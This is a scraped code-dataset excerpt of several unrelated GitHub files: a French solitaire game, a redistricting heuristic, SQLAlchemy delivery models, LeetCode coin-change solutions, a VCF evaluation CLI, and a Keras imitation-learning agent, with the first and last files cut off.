'3S.svg', '4C.svg', '4D.svg', '4H.svg', '4S.svg', '5C.svg', '5D.svg', '5H.svg', '5S.svg', '6C.svg', '6D.svg', '6H.svg', '6S.svg', '7C.svg', '7D.svg', '7H.svg', '7S.svg', '8C.svg', '8D.svg', '8H.svg', '8S.svg', '9C.svg', '9D.svg', '9H.svg', '9S.svg', '10C.svg', '10D.svg', '10H.svg', '10S.svg','JC.svg', 'JD.svg', 'JH.svg', 'JS.svg', 'QC.svg', 'QD.svg', 'QH.svg', 'QS.svg', 'KC.svg', 'KD.svg', 'KH.svg', 'KS.svg','empty.svg']\n\n# fonction qui prend en paramètre un tableau (vide si il n'y une crée une nouvelle matrice, ou une liste contenant\n# les cartes à ne pas brasser lorsque le boutton brasser est appuyé. retourne une matrice contentant 4 tableau de 13\n# chiffres aléatoire non répétitif (sauf pour les cases vide qui sont représentés par des -1). Chaque chiffres est la\n# position à aller chercher dans le liste cards lors de l'affichage \ndef createMatrix(noMatrix):\n nbCards =48 \n tab=[[],[],[],[]]\n\n listOrdRef=list(range(nbCards)) # créé une liste de 48\n print(listOrdRef)\n for _ in range(4): # rajoute case vide\n listOrdRef.append(-1)\n\n nbCards +=4\n rangee=nbCards/4\n\n for exception in noMatrix: # met les positions qui ne doit pas être déplacé\n listOrdRef.remove(exception[0])\n tab[exception[1]].append(exception[0])\n nbCards-=1\n\n for i in tab: \n while len(i)\n #jeu table { float: none; }\n #jeu table td { border: 0; padding: 1px 2px; height: auto; }\n #jeu table td img { height: auto; }\n\n\"\"\"\nbuttonShuffle=\"\"\"\n

\n
\n\n

Vous pouvez encore

\n \n

\n \n
\n \"\"\"\nbuttonRedo = \"\"\"\n
\n
\n \n
\n \"\"\"\n\n\n# fonction qui prend deux strings en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef tdHTML(attrs, contenu):\n return ''+contenu+''\n\n# fonction qui prend une string en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef imgHTML(src):\n return ''\n\n# fonction qui prend une string en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef trHTML(contenu):\n return '' + contenu + ''\n\n# fonction qui prend une string en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef tableHTML(contenu):\n return '
' + contenu + '
'\n\n\n# fonction qui permet créer une string pour l'affichage HTML à partir de la matrice matrix qui est créé par la\n# fonction create matrix\ndef arrayHTML():\n arrayText = \"\"\n for i in range(len(matrix)): # passe à travers chaque list de matrix\n arrayTextInner = \"\"\n for j in range (len(matrix[i])): # passe à travers chaque nombres dans les listes\n\n case = str(j+i*len(matrix[i]))\n temp = imgHTML(cards[matrix[i][j]]) # assigne le id et le onclick au td\n temp1 = ' id=\"case' + case +'\" onclick=\"clic(' + case +')\"'\n arrayTextInner += tdHTML(temp1,temp)\n \n arrayText += trHTML(arrayTextInner)\n return tableHTML(arrayText)\n\n# fonction permettant de brasser les cartes tout en préservant les cartes déjà placées.\ndef brasser():\n global matrix; global nbBrasser\n \n noMatrix=[]\n rangee=len(matrix[0])\n for r in range(4): # pour chaque rangée: \n if matrix[r][0]<=3 and matrix[r][0]>-1: # si la première carte de la rangée est un deux:\n noMatrix.append([matrix[r][0],r]) # ajouter la carte à noMatrix\n for i in range(1,rangee): # pour chaque carte de cette rangé suivant le deux\n if matrix[r][i]==4*i+matrix[r][0]: # si la carte suivante correspond bien à la suite d'une même couleur:\n noMatrix.append([matrix[r][i],r]) # ajouter la valeur de la carte suivante à noMatrix\n else:\n break # sinon passer a la rangée suivante\n\n matrix =createMatrix(noMatrix)\n nbBrasser -=1\n ifOver()\n init()\n\n# fonction qui détermine si elle est encore possible de brasser. Si il n'est pu possible de brasser, elle enlève le \n# bouton qui permet de brasser \ndef ifOver():\n global buttonShuffle\n if nbBrasser <= 0: \n buttonShuffle=\"\"\"\n

\n
\n

Vous ne pouvez plus brasser

\n
\n \"\"\"\n\n# fonction permettant de recommencer une partie en remttant tout les paramêtres\n# à leur état initial.\ndef recommencer():\n global nbBrasser; global matrix; global buttonShuffle \n nbBrasser=3 \n matrix=createMatrix([])\n buttonShuffle=\"\"\"\n

\n
\n

Vous pouvez encore

\n \n

\n
\n \"\"\"\n init() # fait appelle à init() pour appliquer les valeurs initiales à l'HTML\n\n# fonction utilisée dans greenCards() qui retourne un tableau contenant\n# les valeurs des cartes à déplacer en plus des coordonées de la carte blanche à remplacer.\ndef options():\n movable=[]\n rangee=len(matrix[0])\n for r in range(4):\n for i in range(rangee):\n if matrix[r][i]==-1: # si la carte est vide:\n if i==0: # si il s'agit de la première carte de la rangée:\n for deux in range(4): # ajouter tous les deux à \"movable\"\n movable.append([deux,[r,0]]) \n else:\n if matrix[r][i-1]>43 or matrix[r][i-1]==-1: # si la carte précedente est vide ou si c'est un roi:\n continue # passer à la carte suivante\n else:\n x=matrix[r][i-1]+4 # ajouter la valeur de la carte à \"movable\"\n movable.append([x,[r,i]]) # en plus de [r,i] qui sont les coordonnées de la case vide\n return movable\n\n# fonction permettant de changer la couleur de fond des carte à déplacer.\ndef greenCards():\n movable = options()\n copy=[]\n for i in range(4):\n copy.extend(matrix[i]) # crée un tableau simple à partir de la matrix\n for tab in movable: # pour chaque tableau de \"movable\":\n num=copy.index(tab[0]) # num= valeur de la carte à déplacer\n case='#case'+str(num)\n document.querySelector(case+' > img').setAttribute(\"style\", \"background-color: lime\") #changer la couleur de la carte à déplacer\n\n# fonction permettant de remplacer les carte directement dans l'HTML et de changer la couleur\n# des cartes en fonction de ces changements.\ndef change(case,movable,space):\n caseId1='#case'+str(case)\n original=document.querySelector(caseId1).innerHTML\n caseId2='#case'+str(space)\n empty=document.querySelector(caseId2).innerHTML\n \n document.querySelector(caseId1).innerHTML=empty # échanger la position de carte en vide avec la carte à déplacer\n document.querySelector(caseId2).innerHTML=original\n\n copy=[]\n for i in range(4):\n copy.extend(matrix[i]) # crée un tableau simple à partir de la matrix\n for tab in movable: # pour chaque tableau de \"movable\":\n num=copy.index(tab[0])\n case='#case'+str(num) # num= valeur de la carte déplacée\n document.querySelector(case+' > img').removeAttribute(\"style\") # enlever le style de tout les cartes qui pouvaient être déplacer\n\n# fonction permettant d'envoyer un message adapté à la situation du jeux\n# (victoire, échec, obligation de brasser)\ndef verification():\n for i in range(4): # si la dernière carte de la rangé est vide & \n if matrix[i][-1]==-1 and matrix[i][-2]==matrix[i][0]+11*4: # avant dernière carte==au roi de la carte en première position:\n gagner=True\n else:\n gagner=False\n break \n if nbBrasser > 0 and gagner==False: # si on peut encore brasser et qu'on n'a pas gagné: obligation de brasser\n document.querySelector(\"#message\").innerHTML=\"\"\"\n

Vous devez

\n \n \"\"\"\n if nbBrasser <= 0 and gagner==False: # si on peut plus brasser et qu'on n'a pas gagné: echec\n document.querySelector(\"#message\").innerHTML=\"\"\"\n

\n Vous n'avez pas réussi à placer toutes les cartes... Essayez à nouveau!

\n \"\"\"\n if gagner==True: # si on a gagné: alerter le joueur\n document.querySelector(\"#message\").innerHTML=\"\"\"\n

Vous avez réussi! Bravo!

\n \"\"\"\n\n# fonction qui applique les fonctions options(), change(), greenCards() et verification() en fonction de la position\n# du clic du joueur.\ndef clic(case):\n global matrix\n movable=options()\n index=case%13 # index dans la rangée\n r=math.floor(case/13) # position en terme de rangée\n valeur=matrix[r][index] # valeur de la carte dans la case donnée\n for tab in movable: \n if tab[0]==valeur: \n matrix[tab[1][0]].pop(tab[1][1]) # retirer dans la rangée (tab[1][0]) la valeur située à l'index (tab[1][1]) corréspondant à la case vide\n matrix[tab[1][0]].insert(tab[1][1],valeur) # ajouter à cette même position la valeur de la carte à déplacer\n space=tab[1][0]*13+tab[1][1] # retirer la valeur de l'index (tab[1][1]) de la rangée tab[1][0]) correspondant à la carte à déplacer\n matrix[r].pop(index) # ajouter à cette même position la valeur d'une carte vide (soi -1)\n matrix[r].insert(index,-1) # calculer l'id de la case vide à partir de la rangée(tab[1][0]) et l'index (tab[1][1]) contenu dans le tableau de \"movable\"\n change(case,movable,space) # changer la position dans l'HTML grâce à la nouvelle matrix\n break\n greenCards()\n if \"lime\" not in document.querySelector(\"#jeu\").innerHTML: \n verification()\n\n\n# fonction que permet de modifier l'intérieur de la balise ayant l'id main. Ensuite elle met en place le nombre de \n# shuffle qui reste et initialise la fonction qui permet de mettre en lime les cartes que l'on peut déplacer\ndef init():\n document.querySelector(\"#main\").innerHTML = styleHTML + arrayHTML() + buttonShuffle + buttonRedo\n document.querySelector(\"#nbShuffle\").innerHTML = str(nbBrasser) + \" fois\"\n greenCards()","repo_name":"tobiaslepoutre/solitaire","sub_path":"tp2.py","file_name":"tp2.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17087852257","text":"import networkx as nx\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom gerrychain import Graph\nfrom tqdm import tqdm\n\n# Parameters\n# ==============================\n\n# How many districts to generate\nN_DISTRICTS = 25\n\n# How far seed tracts must be apart, at minimum\nMIN_SEED_DISTANCE = 10\n\n# Tracts with EJ >= EJ_MINORITY_CUTOFF\n# are considered \"minority\"\nEJ_MINORITY_CUTOFF = 3\n\n# The minority vote wins if\n# CROSSOVER_PERCENT of majority voters crossover\nCROSSOVER_PERCENT = 0.2\n\n# Load generated graph\ngraph = Graph.from_json('data/gen/graph.json')\n\nTractId = int\nDistrict = tuple[TractId, list[TractId]]\n\ntracts_file = 'data/src/ACS_2018_5YR_TRACT_36_NEW_YORK.gdb'\ngeo_layer = 'ACS_2018_5YR_TRACT_36_NEW_YORK'\ntracts_geo = gpd.read_file(tracts_file, layer=geo_layer)\ntracts_geo.set_index('GEOID', inplace=True)\ntracts_geo['Label'] = 'Unassigned'\n\ncolor_mapping = {\n 'Unassigned': '#eeeeee',\n 'Seed': '#ff0000',\n}\ndistrict_colors = [\n '#5E4FA2',\n '#54AEAD',\n '#BFE5A0',\n '#FFFFBD',\n '#FDBF6F',\n '#E85C47',\n '#9D0041'\n]\nfor i in range(N_DISTRICTS):\n idx = i % len(district_colors)\n color_mapping['District {}'.format(i)] = district_colors[idx]\n\ndistances = defaultdict(dict)\n\ndef get_distance(source, target) -> int:\n dist = distances.get(source, {}).get(target)\n if dist is None:\n path = nx.shortest_path(graph, source=source, target=target)\n dist = len(path)\n distances[source][target] = dist\n distances[target][source] = dist\n return dist\n\ndef select_seeds():\n pbar = tqdm(total=N_DISTRICTS, desc='Finding seeds')\n node_ids = list(graph.nodes)\n\n # Sort by EJ class, high to low\n node_ids.sort(key=lambda id: -graph.nodes[id]['EJ_Class'])\n\n seeds = [node_ids.pop(0)]\n pbar.update(1)\n\n while len(seeds) < N_DISTRICTS and node_ids:\n node_id = node_ids.pop(0)\n dists = [get_distance(seed, node_id) for seed in seeds]\n if all(dist >= MIN_SEED_DISTANCE for dist in dists):\n seeds.append(node_id)\n pbar.update(1)\n\n return seeds\n\ndef is_minority(tract) -> bool:\n return tract['EJ_Class'] >= EJ_MINORITY_CUTOFF\n\ndef vote_fn(tract_id: TractId) -> tuple[float, float]:\n \"\"\"Return the minority and majority candidate votes\n for a given tract. The naive version of this assumes\n all minority voters vote for the minority candidate and\n all majority voters vote for the majority candidate.\n We then incorporate the desired crossover amount to give\n a majority for the minority candidate.\n Ideally you would use real election data to\n reflect actual voting patterns, but we were unable to\n find adequately detailed data.\n \"\"\"\n tract = graph.nodes[tract_id]\n pop = tract['population']\n if is_minority(tract):\n maj_vote = 0\n min_vote = pop\n else:\n maj_vote = (1-CROSSOVER_PERCENT) * pop\n min_vote = CROSSOVER_PERCENT * pop\n return min_vote, maj_vote\n\ndef get_candidates(district: District, unclaimed: set[TractId]) -> list[TractId]:\n \"\"\"Get candidate tracts for a district.\n These tracts are adjacent to the existing district\n that are closest to the seed tract (to ensure compactness).\"\"\"\n seed, tract_ids = district\n neighbors = set()\n for tract_id in tract_ids:\n for neighb in graph.neighbors(tract_id):\n if neighb not in tract_ids and neighb in unclaimed:\n neighbors.add(neighb)\n\n dists = []\n for neighb in neighbors:\n dist = get_distance(seed, neighb)\n dists.append(dist)\n\n return [neighb for dist, neighb\n in zip(dists, neighbors)\n if dist >= min(dists)]\n\ndef district_votes(district: District) -> tuple[float, float]:\n _, tract_ids = district\n min_votes, maj_votes = 0, 0\n for tract_id in tract_ids:\n min_vote, maj_vote = vote_fn(tract_id)\n min_votes += min_vote\n maj_votes += maj_vote\n return min_votes, maj_votes\n\ndef district_pop(district: District) -> tuple[float, float]:\n _, tract_ids = district\n min_pop, maj_pop = 0, 0\n for tract_id in tract_ids:\n tract = graph.nodes[tract_id]\n pop = tract['population']\n if is_minority(tract):\n min_pop += pop\n else:\n maj_pop += pop\n return min_pop, maj_pop\n\ndef score_district(district: District) -> float:\n \"\"\"Score a district based on the desired\n crossover amount\"\"\"\n min_votes, maj_votes = district_votes(district)\n\n # Ideal is that min_votes == maj_votes,\n # i.e. with the specified majority crossover\n # minority and majority voters are on equal footing\n diff = abs(min_votes - maj_votes) + 1 # To prevent 0 division\n return 1/diff\n\ndef greedy_search(seeds):\n districts = [(seed, [seed]) for seed in seeds]\n saturated = set()\n unclaimed = set(node_id for node_id in list(graph.nodes) if node_id not in seeds)\n pbar = tqdm(total=len(unclaimed), desc='Forming districts')\n while unclaimed:\n for district in districts:\n seed, tract_ids = district\n if seed in saturated: continue\n cands = get_candidates(district, unclaimed)\n if not cands: # Can happen if the district is surrounded on all sides\n saturated.add(seed)\n continue\n best_cand = max(cands, key=lambda cand: score_district((seed, tract_ids + [cand])))\n tract_ids.append(best_cand)\n unclaimed.remove(best_cand)\n pbar.update(1)\n return districts\n\nif __name__ == '__main__':\n print('Parameters:')\n print(' {} districts'.format(N_DISTRICTS))\n print(' Seeded at least {} tracts apart'.format(MIN_SEED_DISTANCE))\n print(' Tracts with EJ class >= {} considered \"minority\"'.format(EJ_MINORITY_CUTOFF))\n print(' Crossover {}% of majority votes to minority side'.format(CROSSOVER_PERCENT*100))\n\n seeds = select_seeds()\n for seed in seeds:\n tract = graph.nodes[seed]\n tracts_geo.loc[tract['GEOID'], 'Label'] = 'Seed'\n assert len(seeds) == N_DISTRICTS\n\n districts = greedy_search(seeds)\n print(' AbsDiff PctDiff PctMin')\n for i, district in enumerate(districts):\n min_votes, maj_votes = district_votes(district)\n diff = min_votes - maj_votes\n lead = '✅MIN' if diff >= 0 else '❌MAJ'\n min_pop, maj_pop = district_pop(district)\n p_min_pop = min_pop/(min_pop+maj_pop)\n print('District {:2}: {} {:10,} {:6.1f}% {:6.1f}% {}'.format(\n i, lead,\n abs(round(diff)),\n abs(round(diff))/(min_pop+maj_pop) * 100,\n p_min_pop * 100,\n 'X-OVER' if p_min_pop < 0.5 and diff >= 0 else '',\n ))\n\n for i, (_, tract_ids) in enumerate(districts):\n for tract_id in tract_ids[1:]: # First id is seed\n tract = graph.nodes[tract_id]\n tracts_geo.loc[tract['GEOID'], 'Label'] = 'District {}'.format(i)\n\n tracts_geo.plot(color=tracts_geo['Label'].map(color_mapping))\n plt.savefig('districts.png', dpi=300)\n plt.show()\n plt.close()","repo_name":"frnsys/power_districting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72011166225","text":"from sqlalchemy import Column, Integer, Float, String, Boolean, ForeignKey, DateTime, JSON, UUID\nfrom sqlalchemy.orm import relationship\n\nfrom db_config import Base\n\n\nclass User(Base):\n __tablename__ = \"users\"\n\n id = Column('user_id', UUID, primary_key=True)\n username = Column(String)\n password = Column('user_password', String)\n role_id = Column(Integer)\n is_active = Column(Boolean)\n\n\nclass Product(Base):\n __tablename__ = 'products'\n\n id = Column('product_id', UUID, primary_key=True)\n product_name = Column(String)\n price = Column(Float)\n category_id = Column(UUID, ForeignKey('categories.category_id'))\n\n\nclass Category(Base):\n __tablename__ = 'categories'\n\n id = Column('category_id', UUID, primary_key=True)\n category_name = Column(String)\n\n\nclass Order(Base):\n __tablename__ = 'orders'\n\n id = Column('order_id', UUID, primary_key=True)\n customer_name = Column(String, nullable=False)\n delivery_info_id = Column(UUID, ForeignKey('delivery_info.delivery_info_id'), nullable=False)\n data = Column(JSON)\n order_status = Column(String)\n created_at = Column(DateTime(timezone=True))\n updated_at = Column(DateTime(timezone=True))\n\n delivery_info = relationship('DeliveryInfo', back_populates='order', lazy=\"joined\")\n\n\nclass OrderEvent(Base):\n __tablename__ = 'order_events'\n\n id = Column('order_event_id', UUID, primary_key=True)\n order_id = Column(UUID, ForeignKey('orders.order_id'), nullable=False)\n name = Column(String, nullable=False)\n data = Column(JSON)\n created_at = Column(DateTime(timezone=True))\n\n\nclass DeliveryInfo(Base):\n __tablename__ = 'delivery_info'\n\n id = Column('delivery_info_id', UUID, primary_key=True)\n address = Column(String)\n courier_id = Column(UUID, ForeignKey('users.user_id'))\n\n order = relationship('Order', back_populates='delivery_info')\n\n# Base.metadata.create_all(bind=engine)\n\n","repo_name":"tema001/experimental-delivery-api","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26089114049","text":"#recursive, memo, time: s*n, space: s*n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n self.table = {}\n result = self.helper(coins, 0, 0, amount)\n return result if result != sys.maxsize else -1\n \n def helper(self, coins, start, current, amount):\n if current == amount:\n return 0\n if current > amount:\n return -1\n if (start, current) in self.table:\n return self.table[(start, current)]\n result = sys.maxsize\n for idx in range(start, len(coins)):\n forward = self.helper(coins, idx, current+coins[idx], amount)\n if forward == -1:\n continue\n result = min(result, forward+1)\n self.table[(start, current)] = result\n return result\n#DP, time: s*n, space = s\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n table = [sys.maxsize for i in range(amount+1)]\n table[0] = 0\n for coin in coins:\n for idx in range(coin, len(table)):\n table[idx] = min(table[idx], table[idx-coin]+1)\n return table[-1] if table[-1] != sys.maxsize else -1","repo_name":"finderkiller/LeetCode","sub_path":"322CoinChange.py","file_name":"322CoinChange.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30988244332","text":"import gzip\nimport json\nimport os\n\nimport click\n\nfrom cyvcf2 import VCF, Writer # type: ignore\n\nfrom .evaluate import site_concordancy\nfrom .filter import FilterClass, FilterParams, Filterer\nfrom .stats import Stats\n\n\n@click.command()\n@click.option(\"-c\", \"--call-vcf\", type=click.Path(exists=True),\n help=\"Path to VCF with calls to be evaluated\",\n required=True)\n@click.option(\"-p\", \"--positive-vcf\", type=click.Path(exists=True),\n help=\"Path to VCF with known calls\",\n required=True)\n@click.option(\"-cs\", \"--call-samples\", type=click.STRING, multiple=True,\n help=\"Sample(s) in call-vcf to consider. \"\n \"May be called multiple times\",\n required=True)\n@click.option(\"-ps\", \"--positive-samples\", type=click.STRING, multiple=True,\n help=\"Sample(s) in positive-vcf to consider. \"\n \"May be called multiple times\",\n required=True)\n@click.option(\"-s\", \"--stats\", type=click.Path(writable=True),\n help=\"Path to output stats json file\")\n@click.option(\"-dvcf\", \"--discordant-vcf\", type=click.Path(writable=True),\n help=\"Path to output the discordant vcf file\",\n required=False)\n@click.option(\"-mq\", \"--min-qual\", type=float,\n help=\"Minimum quality of variants to consider\", default=30)\n@click.option(\"-md\", \"--min-depth\", type=int,\n help=\"Minimum depth of variants to consider\", default=0)\ndef evaluate_cli(call_vcf, positive_vcf, call_samples, positive_samples,\n min_qual, min_depth, stats, discordant_vcf):\n c_vcf = VCF(call_vcf, gts012=True)\n p_vcf = VCF(positive_vcf, gts012=True)\n st, disc = site_concordancy(c_vcf, p_vcf, call_samples,\n positive_samples, min_qual, min_depth)\n # Write the stats json file\n if stats is None:\n print(json.dumps(st))\n else:\n with click.open_file(stats, 'w') as fout:\n fout.write(json.dumps(st))\n\n # If there were discordand records, and a discordant-vcf should be written\n if len(disc) > 0 and discordant_vcf:\n # make sure the parent folder exists\n parent_folder = os.path.dirname(discordant_vcf)\n os.makedirs(parent_folder, exist_ok=True)\n\n with click.open_file(discordant_vcf, 'w') as fout:\n # First, we write the vcf header\n with gzip.open(call_vcf, 'rt') as fin:\n for line in fin:\n if line.startswith('#'):\n fout.write(line)\n else:\n break\n # Then we write the vcf records that were discordant\n for record in disc:\n fout.write(str(record))\n\n\n@click.command()\n@click.option(\"-i\", \"--input\", type=click.Path(exists=True),\n help=\"Path to input VCF file\", required=True)\n@click.option(\"-o\", \"--output\", type=click.Path(writable=True),\n help=\"Path to output (filtered) VCF file\", required=True)\n@click.option(\"-t\", \"--trash\", type=click.Path(writable=True),\n help=\"Path to trash VCF file\", required=True)\n@click.option(\"-p\", \"--params-file\", type=click.Path(exists=True),\n help=\"Path to filter params json\", required=True)\n@click.option('--index-sample', type=click.STRING,\n help=\"Name of index sample\", required=True)\n@click.option(\"--immediate-return/--no-immediate-return\",\n default=True,\n help=\"Immediately write filters to file \"\n \"upon hitting one filter criterium. \"\n \"Default = True\")\ndef filter_cli(input, output, trash, params_file,\n index_sample, immediate_return):\n vcf = VCF(input, gts012=True)\n\n idx = vcf.samples.index(index_sample)\n for filter_item in list(FilterClass):\n vcf.add_filter_to_header(filter_item.value)\n\n out = Writer(output, vcf)\n tr = Writer(trash, vcf)\n\n filter_params = FilterParams(params_file)\n\n filter_it = Filterer(vcf, filter_params, idx, immediate_return)\n\n for record, fi in filter_it:\n if fi is None or len(fi) == 0:\n out.write_record(record)\n else:\n record.FILTER = [x.name for x in fi]\n tr.write_record(record)\n\n out.close()\n tr.close()\n\n\n@click.command()\n@click.option(\"-i\",\n \"--input\",\n type=click.Path(exists=True, dir_okay=False, readable=True),\n required=True,\n help=\"Input VCF file\")\ndef stats_cli(input):\n stats = Stats(input)\n print(stats.as_json)\n","repo_name":"LUMC/vtools","sub_path":"src/vtools/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11488200307","text":"#!/usr/bin/env python\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import *\nfrom keras.optimizers import RMSprop, Adam\nimport numpy as np\nimport random\nfrom collections import deque\nimport gym\nimport pickle\nimport os, sys, copy, argparse\nimport cv2\nfrom keras import backend as K\nfrom keras.layers import Lambda\nfrom keras.models import Model\n\nimport pdb\n\n\n\nclass RLAgents():\n\t\"\"\"\n\tDifferent reinforcement learning for different mini-tasks\n\tdynamically adding new agents\n\t\"\"\"\n\tdef __init__(self, state_dim, action_cnt, env_name='MZ'):\n\t\t\"\"\"\n\t\tstate_dim: dimension of states, tuple: (84, 84, 4)\n\t\taction_cnt: dimension of actions, scala\n\t\tenv_name: environment name, for keeping track\n\t\t\"\"\"\n\t\tself.state_dim = state_dim\n\t\tself.action_cnt = action_cnt\n\t\tself.env_name = env_name\n\t\tself.Agent_Dict = {}\n\n\tdef _get_agent(self, mini_task):\n\t\t\"\"\"\n\t\tmini_task: string for mini_task, each agent correspond to a mini_task\n\t\t\"\"\"\n\t\tif mini_task not in self.Agent_Dict:\n\t\t\tself.Agent_Dict[mini_task] = Imitation_Agent(self.state_dim, self.action_cnt, self.env_name, mini_task, \n\t\t\t\t\t\t\t\t\t\t\t\t lr=1e-3, train=True, save_every_step=1000, debug=False)\n\t\treturn self.Agent_Dict[mini_task]\n\n\tdef feedback(self, mini_task, feedbacks):\n\t\tagent = self._get_agent(mini_task)\n\t\tagent.step(feedbacks)\n\n\tdef execute(self, mini_task, states):\n\t\tagent = self._get_agent(mini_task)\n\n\t\taction = agent.predict(states)\n\t\t\n\t\treturn action\n\n\nclass Imitation_Agent():\n\t\"\"\"\n\tPolicy network imitation learning agent.\n\t\"\"\"\n\tdef __init__(self, state_dim, action_cnt, env_name, mini_task, lr=1e-3,\n\t\t\t\t train=True, save_every_step=1000, debug=False):\n\t\t\"\"\"\n\t\tInitialize a imitation learning agent.\n\n\t\t@param state_dim The dimension of states. (84, 84, 4)\n\t\t@param action_cnt The number of actions. scala\n\t\t@param env_name The name of the environment.\n\t\t@param mini_task The mini task for the network.\n\t\t@param train The switch to train the model. (default: True)\n\t\t\"\"\"\n\n\t\tself.state_dim = state_dim\n\t\tself.action_cnt = action_cnt\n\t\t# initialize the full actions array\n\t\tself.all_actions = [i for i in range(self.action_cnt)]\n\n\t\tself.env_name = env_name\n\t\tself.mini_task = mini_task\n\n\t\tself.debug = debug\n\t\tself.should_train = train\n\n\t\t# initialize the policy network and load weights if exist\n\t\tself.batch_size = 32\n\t\tself.learning_rate = lr\n\t\tself.network = PolicyNetwork(self.state_dim, self.action_cnt, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.env_name, self.mini_task,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.batch_size, self.learning_rate)\n\t\tself.step_cnt = 0\n\t\tself.save_every_step = save_every_step\n\n\t\t# load the saved model weights\n\t\tif os.path.isfile(self.network.default_weights_path):\n\t\t\tself.network.load_weights()\n\n\t\n\tdef predict(self, s):\n\t\t\"\"\"\n\t\tPredict the policy for the input state.\n\n\t\t@param s The current state.\n\t\t@return The action to take learned from expert.\n\t\t\"\"\"\n\t\taction_logits = self.network.predict(s)\n\t\taction = np.argmax(action_logits[0]) # TODO\n\t\treturn action\n\t\n\tdef step(self, feedbacks):\n\t\t\"\"\"\n\t\tStep forward to the next state.\n\n\t\tfeedbacks: a tuple. \n\t\t\t\t\texample: \n\t\t\t\t\t\t(state_images, actions, next_states, rewards, done)\n\t\t\t\t\t\tstate_images and next_states should be of shape (1, 84, 84, 4)\n\t\t\t\t\t\taction should be a scala\n\t\t\t\t\t\trewards should be a scala, the sum of rewards for the 4 frames\n\t\t\t\t\t\tdone should be a boolean\n\t\t\"\"\"\n\t\tstate_images, actions, _, _, _ = feedbacks\n\n\t\taction_idx = actions[0] # all actions the same\n\t\taction = np.zeros((1, self.action_cnt))\n\t\taction[0, action_idx] = 1\n\n\t\tself.network.train(state_images, action)\n\t\t\n\t\t# save network\n\t\tself.step_cnt += 1\n\t\tif self.should_train and self.step_cnt % self.save_every_step == 0 and self.step_cnt != 0:\n\t\t\t# save the latest model weights\n\t\t\tself.network.save_weights()\n\n\n\nclass PolicyNetwork():\n\tdef __init__(self, state_dim, action_cnt, env_name, suffix, batch_size=32, learning_rate=1e-4, debug=False):\n\t\t\"\"\"\n\t\tInitialize a policy network instance.\n\n\t\t@param state_dim The dimension of state space. (84, 84, 4)\n\t\t@param action_cnt The dimension of action space. scala\n\t\t@param env_name The name of the environment.\n\t\t@param suffix The test case suffix for the network.\n\t\t@param batch_size The size of the mini-batch in mini-batch gradient descent \n\t\t\t\t\t\t\t\t\t\t\toptimization for training the network. (default: 32)\n\t\t@param learning_rate The learning rate for training the network. \n\t\t\t\t\t\t\t\t\t\t\t\t (default: 1e-4)\n\t\t\"\"\"\n\n\t\tself.state_dim = state_dim\n\t\tself.action_cnt = action_cnt\n\n\t\tself.env_name = env_name\n\t\tself.suffix = suffix\n\n\t\tself.batch_size = batch_size\n\t\tself.learning_rate = learning_rate\n\n\t\tself.debug = debug\n\n\t\t# construct default file paths\n\t\tself.default_model_path = 'save_PN_' + self.env_name + '_' + self.suffix + '_model.h5'\n\t\tself.default_weights_path = 'save_PN_' + self.env_name + '_' + self.suffix + '_weights.h5'\n\n\t\t# build the keras model\n\t\tself.model = self._build_model()\n\n\tdef _build_model(self):\n\t\t\"\"\"\n\t\t(Internal)\n\t\tBuild the keras model of the policy network.\n\n\t\t@return A built keras model.\n\t\t\"\"\"\n\n\t\tmodel_input = Input(shape=self.state_dim)\n\n\t\tx = Conv2D(filters=32, kernel_size=8, strides=4, padding=\"valid\", activation=\"relu\")(model_input)\n\t\tx = Conv2D(filters=64, kernel_size=4, strides=2, padding=\"valid\", activation=\"relu\")(x)\n\t\tx = Conv2D(filters=64, kernel_size=3, strides=1, padding=\"valid\", activation=\"relu\")(x)\n\t\tx = Flatten()(x)\n\t\tx = Dense(activation='relu', units=512)(x)\n\t\taction_logits = Dense(activation='softmax', units=self.action_cnt)(x)\n\n\t\tmodel = Model(input=model_input, output=action_logits)\n\n\t\toptimizerRMSprop = RMSprop(lr=self.learning_rate)\n\t\toptimizerAdam = Adam(lr=self.learning_rate, beta_1=0.9, beta_2=0.999)\n\t\toptimizer = optimizerAdam # TODO\n\n\t\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer)\n\n\t\treturn model\n\n\tdef train(self, X, Y, epochs=1, verbose=0):\n\t\tself.model.fit(X, Y, epochs=epochs, verbose=verbose)\n\n\tdef predict(self, state):\n\n\t\tprediction = self.model.predict(state)\n\t\treturn prediction\n\n\tdef save_model(self, file_path=None):\n\t\t\"\"\"\n\t\tSave the keras model as a file.\n\n\t\t@param file_path The file path to save the keras model. (optional)\n\t\t@return The path to the saved keras model file.\n\t\t\"\"\"\n\t\t\n\t\tif file_path is None:\n\t\t\tfile_path = self.default_model_path\n\n\t\tif self.debug:\n\t\t\tprint(\"-----saving model to {}\".format(file_path))\n\t\t\t\n\t\tself.model.save(file_path)\n\n\t\treturn file_path\n\n\tdef save_weights(self, file_path=None):\n\t\t\"\"\"\n\t\tSave the keras model weights as a file.\n\n\t\t@param file_path The file path to save the keras model weights. (optional)\n\t\t@return The path to the saved keras weights file.\n\t\t\"\"\"\n\n\t\tif file_path is None:\n\t\t\tfile_path = self.default_weights_path\n\n\t\tif 